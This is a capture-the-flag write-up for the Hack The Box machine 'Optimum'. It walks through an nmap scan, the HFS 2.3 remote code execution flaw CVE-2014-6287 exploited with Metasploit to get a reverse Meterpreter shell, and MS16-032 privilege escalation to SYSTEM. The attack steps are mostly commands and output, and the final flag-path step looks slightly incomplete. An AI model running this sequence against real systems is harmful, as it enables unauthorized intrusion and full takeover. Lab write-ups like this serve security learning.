Post

Optimum HTB

Posted
By R00tBegginer
2 min read
Optimum HTB

Objective

Get root by attacking the HttpFileServer version using Metasploit.

Nmap.

1
2
3
4
5
6
7
8
9
10
11
12

nmap -p- --open -sS --min-rate 5000 -n -Pn 10.10.10.8 -vvv -sCV

Discovered open port 80/tcp on 10.10.10.8

PORT   STATE SERVICE REASON          VERSION
80/tcp open  http    syn-ack ttl 127 HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

In the nmap scan we see that only port 80 is open, that it is a Windows machine due to the TTL shown, and that the service running on that port is HttpFileServer version httpd 2.3.

Investigation.

With this information, the first thing we do is search online for possible vulnerabilities of that version, and we find this:

Critical Vulnerability in Rejetto HTTP File Server (CVE-2014-6287)

Type: Code Injection (Improper Control of Code Generation, CWE-94)

Date: Published in 2014, last updated in 2025

Description: A flaw in the findMacroMarker function allows remote attackers to execute arbitrary code by sending a specific %00 sequence in a search action.

Impact: Very high, with a CVSS v3.x score of 9.8 (critical) and CVSS v2.0 score of 10.0 (high).

Explotation

1
2
3
4
5
6
7
8
9
10

msfconsole # Open the Metasploit console
search HttpFileServer # Search for any available exploit modules; only one option appears:
" 0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution"
use 0 # Select the exploit to use
options # Check the required options to run the exploit
# Requires RHOST (target IP) and LHOST (our IP)
set RHOSTS 10.10.10.8
set LHOST your_ip
run # Launch the exploit
# This returns a Meterpreter shell on the victim machine. Next, how to get the first flag.

User Flag.

1
2
3
4
5

With the Meterpreter session obtained: 
shell # Open a standard shell (for convenience)
whoami # It shows we are user 'kostas'
dir # List files in the current directory and find the first flag
type user.txt

Privilege escalation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

# To see how to escalate privileges, background the session by typing:
background
use /post/multi/recon/local_exploit_suggester # Use this module to find possible privilege escalation exploits
set SESSION 1 # Set the session to the one we just backgrounded
run
# The module returns potential vulnerabilities:
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
 5   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/tokenmagic                               Yes        
# We will use option 5
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
options # It requires LHOST
set LHOST your_ip
run
# We get a new shell.
getuid # We check the user; it should be NT AUTHORITY\SYSTEM, which means privilege escalation succeeded.

ROOT FLAG

1
2

cd /
cd Administrator/Desktop #There is the flag
Write ups
HttpFileServer Metasploit
This post is licensed under CC BY 4.0 by the author.